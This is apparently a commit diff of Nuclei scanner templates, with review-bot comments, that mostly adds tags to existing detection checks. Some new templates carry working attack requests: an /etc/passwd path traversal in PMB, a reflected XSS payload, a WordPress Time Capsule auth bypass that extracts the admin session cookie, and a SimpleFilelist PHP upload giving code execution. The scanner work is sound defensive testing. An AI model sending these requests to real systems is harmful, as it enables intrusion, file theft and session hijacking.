- "No snippets found"
negative: true
part: body


@ -4,6 +4,7 @@ info:
name: Apache Hadoop Unauth
author: pdteam
severity: low
tags: apache,hadoop,unauth
requests:
- method: GET


@ -5,7 +5,7 @@ info:
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/ghdb/4191
tags: logs
tags: logs,haproxy
requests:
- method: GET


@ -4,7 +4,7 @@ info:
name: Horde Groupware Unauthenticated
author: pikpikcu
severity: critical
tags: horde
tags: horde,unauth
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: high
reference: https://hackerone.com/reports/1088429
tags: unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK
severity: medium
tags: config
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: low
reference: https://www.exploit-db.com/ghdb/5215
tags: jboss,unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: JK Status Manager
author: pd-team
severity: low
tags: config
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: pentest_swissky
severity: critical
description: Unauthenticated access to Jupyter instance
tags: unauth
requests:
- method: GET


@ -6,6 +6,7 @@ info:
severity: critical
description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration.
reference: https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/
tags: k8,unauth
requests:
- method: GET


@ -1,9 +1,10 @@
id: larvel-debug-error
id: laravel-debug-error
info:
name: Larvel Debug Method Enabled
author: dhiyaneshDK
severity: medium
tags: debug,laravel
requests:
- method: GET
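Review bot: The `id:` is corrected from `larvel-debug-error` to `laravel-debug-error`, but the `name:` line two lines below still reads `Larvel Debug Method Enabled`; change it to `name: Laravel Debug Method Enabled` so the two agree. The added `tags: debug,laravel` already uses the correct spelling.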


@ -19,6 +19,7 @@ info:
name: Linkerd SSRF detection
author: dudez
severity: info
tags: ssrf,linkerd
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: PR3R00T
severity: high
description: Manage Engine AD Manager service can be configured to allow anonymous users to browse the AD list remotely.
tags: unauth
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: low
reference: https://www.exploit-db.com/ghdb/4395
tags: unauth
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: critical
reference: https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html
tags: docker,unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Nginx Status Page
author: dhiyaneshDK
severity: low
tags: config,nginx
requests:
- method: GET


@ -0,0 +1,21 @@
id: panasonic-network-management
info:
name: Panasonic Network Camera Management System
author: dhiyaneshDk
severity: medium
reference: https://www.exploit-db.com/ghdb/6487
requests:
- method: GET
path:
- "{{BaseURL}}/config/cam_portal.cgi"
matchers-condition: and
matchers:
- type: word
words:
- '<TITLE>Panasonic Network Camera Management System</TITLE>'
part: body
- type: status
status:
- 200


@ -4,6 +4,7 @@ info:
name: PHP errors
author: w4cky_
severity: info
tags: debug
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: PHP-FPM Status
author: geeknik
severity: info
tags: config
requests:
- method: GET


@ -6,6 +6,7 @@ info:
severity: high
reference: https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/
tags: phpmyadmin,lfi
requests:
- raw:
- |


@ -4,8 +4,8 @@ info:
name: PUT method enabled
author: xElkomy
severity: high
# https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
tags: injection
requests:
- raw:


@ -4,6 +4,7 @@ info:
name: rack-mini-profiler environmnet information discloure
author: vzamanillo
severity: high
tags: config,debug
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: aaron_costello (@ConspiracyProof)
severity: info
reference: https://www.enumerated.de/index/salesforce
tags: aura,unauth,salesforce
requests:
- method: POST
@ -12,6 +13,7 @@ requests:
- "{{BaseURL}}/aura"
- "{{BaseURL}}/s/sfsites/aura"
- "{{BaseURL}}/sfsites/aura"
body: "{}"
matchers:


@ -4,10 +4,10 @@ info:
name: Server Status Disclosure
author: pd-team & geeknik
severity: low
tags: config
requests:
- method: GET
# Example of sending some headers to the servers
headers:
X-Client-IP: "127.0.0.1"
X-Remote-IP: "127.0.0.1"


@ -5,6 +5,7 @@ info:
author: pentest_swissky & geeknik
severity: low
description: Discover history for bash, ksh, sh, and zsh
tags: config
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: sidekiq-dashboard
author: dhiyaneshDK
severity: medium
tags: unauth
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: High
reference: https://www.exploit-db.com/ghdb/5856
tags: solr,unauth
requests:
- method: GET


@ -4,7 +4,9 @@ info:
author: organiccrap
severity: high
description: todo
# reference: https://github.com/synacktiv/eos
reference: https://github.com/synacktiv/eos
tags: symfony,debug
requests:
- method: GET
path:


@ -4,6 +4,7 @@ info:
name: Detect Tomcat Exposed Scripts
author: Co0nan
severity: info
tags: apache
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Unauthenticated Airflow Instance
author: dhiyaneshDK
severity: high
tags: apache,airflow,unauth
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: high
reference: https://www.exploit-db.com/ghdb/5684
tags: mongo,unauth
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: taielab & @pikpikcu
severity: critical
issues: https://github.com/alibaba/nacos/issues/4593
tags: nacos,unauth
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: high
reference: https://www.exploit-db.com/ghdb/5808
tags: config,unauth
requests:
- method: GET


@ -4,8 +4,8 @@ info:
name: WAMP xdebug
author: e_schultze_
severity: info
# Inspired on https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py
# Goal: detect if xdebug.remote_connect_back is enabled
reference: https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py
tags: debug,config
requests:
- method: GET
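Review bot: The reworked info block keeps the link but drops the only statement of intent, `# Goal: detect if xdebug.remote_connect_back is enabled`, which appears to be on the removed side (this page does not preserve the `+`/`-` markers, so that is inferred from the surviving `reference:` line). That sentence belongs in a `description:` key rather than a comment, e.g. `description: Detects whether xdebug.remote_connect_back is enabled`, so it survives as template metadata instead of being lost. The `requests:` block continues outside the hunk.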


@ -6,6 +6,7 @@ info:
severity: medium
description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive
information disclosure
tags: unauth
requests:
- method: GET


@ -0,0 +1,20 @@
id: openam-detection
info:
name: Detect openam
author: melbadry9 & xelkomy
severity: info
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
requests:
- method: GET
path:
- "{{BaseURL}}/openam/ui/PWResetUserValidation"
- "{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation"
- "{{BaseURL}}/ui/PWResetUserValidation"
matchers:
- type: dsl
dsl:
- 'contains(body, "jato.pageSession") && status_code==200'
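Review bot: The `description:` recounts an LDAP-injection vulnerability in the password-reset flow, but the template is a `severity: info` detection whose only matcher checks for `jato.pageSession` with a 200 on the `PWResetUserValidation` pages; the description should say what is detected (an exposed OpenAM password-reset page) and leave the vulnerability narrative to the reference. There is also no `tags:` key, unlike the other new templates here (`thinkcmf`, `blackboard,parentlink,xss`, `wordpress,...`), so tag-based selection will skip it; `tags: openam` would be the minimum. `user’s` uses a curly apostrophe where the rest of the corpus uses a plain `'`.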


@ -0,0 +1,25 @@
id: thinkcmf-detection
info:
name: ThinkCMF Detection
author: pikpikcu
severity: info
tags: thinkcmf
requests:
- method: GET
path:
- "{{BaseURL}}/"
matchers-condition: and
matchers:
- type: word
words:
- "X-Powered-By: ThinkCMF"
part: header
condition: and
- type: status
status:
- 200
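Review bot: `condition: and` on the first matcher is a no-op because `words:` holds a single entry; dropping it, or adding it only once a second word exists, makes the intent clearer. `X-Powered-By: ThinkCMF` is matched as an exact substring of the header block, so if the word matcher is case-sensitive a server emitting the header name in a different case will not be detected; that limitation is worth a one-line comment above the matcher rather than a change.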


@ -4,12 +4,11 @@ info:
name: Apache Flink Unauth RCE
author: pikpikcu
severity: critical
reference: https://github.com/LandGrey/flink-unauth-rce
tags: apache,flink,rce
# reference:
# https://www.exploit-db.com/exploits/48978
# https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
reference: |
- https://www.exploit-db.com/exploits/48978
- https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
- https://github.com/LandGrey/flink-unauth-rce
requests:
- raw:
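Review bot: `reference: |` turns the three links into one multi-line string whose lines literally begin with `- `, not a YAML sequence; this mirrors the CVE-2017-3881 template in the same commit, so it is presumably what the loader's reference field expects today, but if that field accepts (or later becomes) a list, dropping the `|` so the `- ` entries parse as a sequence is the portable form. The two competing `reference:` lines visible here, the single LandGrey URL and the block, are presumably the old and new side of the change, since the page drops the `+`/`-` markers. `requests:` continues outside the hunk.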


@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
tags: bullwark,lfi
reference: https://www.exploit-db.com/exploits/47773
# reference:-https://www.exploit-db.com/exploits/47773
# Vendor Homepage: http://www.bullwark.net/
# Version : Bullwark Momentum Series Web Server JAWS/1.0
# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
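Review bot: The comment lines that appear to be the removed side (`# Vendor Homepage`, `# Version`, `# Software Link`) carried the only version context for this template, `Bullwark Momentum Series Web Server JAWS/1.0`, and nothing in the new info block keeps it. A `description:` such as `description: Local file inclusion in Bullwark Momentum Series Web Server JAWS/1.0` preserves it as metadata instead of a comment that the diff now discards. The info block starts outside the hunk.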


@ -0,0 +1,31 @@
id: parentlink-xss
info:
name: Blackboard ParentLink Reflected XSS
author: r3naissance
severity: medium
tags: blackboard,parentlink,xss
reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
requests:
- method: GET
path:
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
matchers-condition: and
matchers:
- type: word
words:
- '<img src=c onerror=alert(8675309)>'
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
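Review bot: The template has no `description:`, and `reference:` points at the generic ParentLink release-notes index rather than the entry that documents this reflected parameter, so a reader cannot tell which version fixed it. A one-line description naming the reflected `message_success` and `message_error` parameters of `/main/blank` (both visible in `path:`) plus a link to the specific release note would complete the info block. Both paths carry the same payload, so the single body `word` matcher is sufficient as written.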


@ -0,0 +1,21 @@
id: pmb-local-file-disclosure
info:
name: PMB 5.6 - 'chemin' Local File Disclosure
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/49054
requests:
- method: GET
path:
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root:x:0"
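Review bot: No `tags:` key is present, unlike the other new templates in this commit (e.g. `tags: bullwark,lfi` in the Bullwark hunk), so tag-based runs such as `-tags lfi` will skip this template; `tags: pmb,lfi` follows the existing convention. A `description:` is also missing; the `name:` already says it is a local file disclosure through the `chemin` parameter of `getgif.php`, and one sentence to that effect would do. `reference:` is set, so those two keys are the only gaps in the info block.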


@ -26,7 +26,6 @@ requests:
- '{{BaseURL}}/wp-config.php~'
- '{{BaseURL}}/wp-config.php.orig'
- '{{BaseURL}}/wp-config.php.original'
- '{{BaseURL}}/wp-license.php?file=../..//wp-config'
- '{{BaseURL}}/_wpeprivate/config.json'
matchers-condition: and
matchers:


@ -0,0 +1,50 @@
id: wordpress-auth-bypass-wptimecapsule
info:
name: WordPress WP Time Capsule Authentication Bypass
author: princechaddha
severity: critical
reference: https://github.com/SECFORCE/WPTimeCapsulePOC
tags: wordpress,auth-bypass,wp-plugin
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
IWP_JSON_PREFIX
- |
GET /wp-admin/index.php HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
- "<h1>Dashboard</h1>"
part: body
condition: and
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200
extractors:
- type: regex
part: header
regex:
- "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
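Review bot: The `regex` extractor captures the value of the authenticated `wordpress_*` session cookie and writes it into scan output, where it persists in result files and logs; the `and`-combined body matchers on the dashboard markup already establish the bypass, so unless the cookie is consumed by a later template the extractor only copies a live credential into reports and can be dropped. There is also no `description:`; one line stating that an unauthenticated `IWP_JSON_PREFIX` request yields an admin session would document the check. Whether a blank line separates `Accept: */*` from the `IWP_JSON_PREFIX` body in the first raw request cannot be seen on this page; without it the line is sent as a header, not a body.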


@ -0,0 +1,74 @@
id: wordpress-rce-simplefilelist
info:
name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
author: princechaddha
severity: critical
reference: https://wpscan.com/vulnerability/10192
tags: wordpress,wp-plugin,rce
requests:
- raw:
- |
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
Content-Length: 693
Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_ID"
1
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_FileUploadDir"
/wp-content/uploads/simple-file-list/
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_Timestamp"
1587258885
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_Token"
ba288252629a5399759b6fde1e205bc2
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="file"; filename="nuclei.png"
Content-Type: image/png
<?php echo "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
--6985fa39c0698d07f6d418b37388e1b2--
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.25.1
Accept: */*
Connection: close
X-Requested-With: XMLHttpRequest
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
- |
GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)'
part: body
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200
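Review bot: The template leaves a persistent artefact on the target: the first request uploads `nuclei.png` containing PHP, the second renames it to `nuclei.php` under `/wp-content/uploads/simple-file-list/`, and nothing removes it afterwards, so every positive hit leaves a callable `phpinfo()` page behind. At minimum a `description:` should state that side effect so operators can clean up; a final request that renames or deletes the file through the same `ee-file-engine.php` action would be better, if the plugin offers one. `Content-Length: 693` and `Content-Length: 81` are hard-coded in the raw requests; if the runner recomputes them this is harmless, otherwise any edit to a body silently desynchronises them. `User-Agent: python-requests/2.25.1` appears only on the second request and reads as copy-paste residue rather than intent.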


@ -0,0 +1,32 @@
id: wordpress-total-upkeep-backup-download
info:
name: WordPress Total Upkeep Database and Files Backup Download
author: princechaddha
severity: high
reference: https://www.exploit-db.com/exploits/49252
tags: wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json"
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
- type: word
words:
- '"filepath"'
- '/wp-content/boldgrid_backup_'
condition: and
part: body
- type: status
status:
- 200
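Review bot: There is no `description:`; the body matcher requires both `"filepath"` and `/wp-content/boldgrid_backup_`, so a single sentence saying the template reports an unauthenticated `restore-info.json` that discloses the path of a Total Upkeep / BoldGrid backup archive would document exactly what is checked. The `and`-combined header, body and status matchers are otherwise consistent with the other new WordPress templates in this commit.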


@ -22,5 +22,4 @@ workflows:
- template: vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot/springboot-h2-db-rce.yaml
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2020/CVE-2020-5410.yaml
- template: cves/2020/CVE-2020-5410.yaml


@ -0,0 +1,13 @@
id: thinkcmf-workflow
info:
name: ThinkCMF Security Checks
author: pdteam
description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/thinkcmf-detection.yaml
subtemplates:
- template: vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
- template: vulnerabilities/thinkcmf/thinkcmf-rce.yaml
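Review bot: The workflow references `vulnerabilities/thinkcmf/thinkcmf-lfi.yaml` and `vulnerabilities/thinkcmf/thinkcmf-rce.yaml`, neither of which appears in the visible part of this commit, whereas `technologies/thinkcmf-detection.yaml` is added here; a workflow whose subtemplate path does not resolve fails at load time, so confirm both files exist at those paths. Unlike the WordPress workflow in this commit, no `matchers: - name:` is given under the detection template; that is fine as long as the detection template has a single unnamed matcher set, which the thinkcmf-detection hunk shows it does.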


@ -5,15 +5,13 @@ info:
description: A simple workflow that runs all wordpress related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: wordpress
subtemplates:
- template: cves/2018/CVE-2018-3810.yaml
- template: cves/2019/CVE-2019-6112.yaml
- template: cves/2019/CVE-2019-6715.yaml
- template: cves/2019/CVE-2019-9978.yaml
@ -22,9 +20,15 @@ workflows:
- template: cves/2019/CVE-2019-19985.yaml
- template: cves/2019/CVE-2019-20141.yaml
- template: cves/2020/CVE-2020-11738.yaml
- template: cves/2020/CVE-2020-24186.yaml
- template: cves/2020/CVE-2020-24312.yaml
- template: cves/2020/CVE-2020-25213.yaml
- template: cves/2020/CVE-2020-13700.yaml
- template: cves/2020/CVE-2020-14092.yaml
- template: cves/2020/CVE-2020-35951.yaml
- template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
- template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
- template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
- template: vulnerabilities/wordpress/sassy-social-share.yaml
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
@ -46,4 +50,4 @@ workflows:
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
- template: vulnerabilities/wordpress/wp-license-file.yaml
- template: vulnerabilities/wordpress/wp-license-file.yaml
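Review bot: The new entries are inserted out of any order (`cves/2020/CVE-2020-25213.yaml` precedes `cves/2020/CVE-2020-13700.yaml` and `CVE-2020-14092.yaml`), which is what makes duplicate entries easy to miss; this same commit is removing a duplicated template line from the springboot workflow. Keeping the `cves/` entries sorted by year and number and the `vulnerabilities/wordpress/` entries alphabetical would stop that from recurring. The last hunk shows `wp-license-file.yaml` twice; since the page drops the `+`/`-` markers this is presumably a whitespace-only change to that line, but if both survive on the new side it is itself a duplicate.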